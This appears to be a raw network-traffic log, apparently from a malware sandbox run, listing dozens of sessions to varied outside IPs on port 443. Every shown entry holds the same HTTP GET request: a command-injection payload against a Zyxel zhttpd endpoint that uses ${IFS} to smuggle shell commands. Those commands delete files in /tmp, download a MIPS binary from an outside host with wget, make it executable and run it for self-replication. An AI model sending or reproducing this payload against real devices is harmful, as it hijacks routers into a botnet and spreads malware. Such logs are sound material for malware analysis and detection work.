                                                Jan 29, 2024 07:07:42.194396973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2844192.168.2.2352298200.238.109.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194458961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2845192.168.2.235870476.37.190.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194480896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2846192.168.2.235792452.126.130.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194514990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2847192.168.2.2343376117.157.172.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194550037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2848192.168.2.2350722118.142.209.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194576979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2849192.168.2.2349582165.227.55.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194710970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2850192.168.2.234450639.193.226.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194741964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2851192.168.2.2353416157.116.146.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194765091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2852192.168.2.2357528162.180.166.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194817066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2853192.168.2.2358858180.89.234.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194874048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2854192.168.2.2354870161.250.30.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194890022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2855192.168.2.2360698116.1.229.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194932938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2856192.168.2.2352894209.223.166.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194958925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2857192.168.2.2349026217.73.225.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.194996119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2858192.168.2.2342258121.65.158.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195034027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2859192.168.2.234673677.239.50.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195069075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2860192.168.2.2355198138.11.3.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195106030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2861192.168.2.235418296.242.111.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195132017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2862192.168.2.2357404203.132.59.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195158958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2863192.168.2.2346110126.57.210.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195180893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2864192.168.2.2345238201.76.52.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195244074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2865192.168.2.2358992187.186.196.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195269108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2866192.168.2.2357240128.113.56.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195312023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2867192.168.2.2346020114.125.30.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195360899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2868192.168.2.2358956188.173.20.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195398092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2869192.168.2.235271878.77.101.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195430994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2870192.168.2.2357350216.187.204.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195461035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2871192.168.2.235829271.185.167.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195482016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2872192.168.2.2336098122.75.188.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195540905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2873192.168.2.2358986102.138.110.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195559025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2874192.168.2.2336072138.255.119.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195609093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2875192.168.2.2335130119.8.64.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195673943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2876192.168.2.2349666204.7.54.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195703030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2877192.168.2.235193867.228.171.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195764065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2878192.168.2.233637214.247.155.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195796967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2879192.168.2.235705646.74.91.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195836067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2880192.168.2.2338276104.29.126.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195861101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2881192.168.2.2351194205.19.150.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195914984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2882192.168.2.235331883.103.175.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195934057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2883192.168.2.2338030176.189.160.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.195965052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2884192.168.2.234623059.25.45.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196016073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2885192.168.2.235456475.75.82.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196048021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2886192.168.2.2351068116.246.228.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196100950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2887192.168.2.2355598203.222.181.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196145058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2888192.168.2.236018288.104.139.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196171045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2889192.168.2.2340850118.171.112.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196193933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2890192.168.2.234281898.128.109.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196230888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2891192.168.2.233778267.78.72.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196280956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2892192.168.2.234406294.37.123.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196327925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2893192.168.2.2358350170.101.153.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196363926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2894192.168.2.2356638162.25.165.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196412086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2895192.168.2.235009091.44.160.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196439981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2896192.168.2.2343146181.214.236.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196455956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2897192.168.2.2336930205.42.217.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196516991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2898192.168.2.235709072.195.158.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196563959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2899192.168.2.234890259.137.144.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196604013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2900192.168.2.2345922222.241.41.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196651936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2901192.168.2.2345194139.203.23.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196651936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2902192.168.2.2344634101.250.68.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196696043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2903192.168.2.2344922150.123.119.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196728945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2904192.168.2.2338808167.41.101.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196755886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2905192.168.2.2349480219.225.74.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196789980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2906192.168.2.2349940182.220.85.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:42.196825027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2907192.168.2.235517475.236.42.58443
                                                TimestampBytes transferredDirectionData
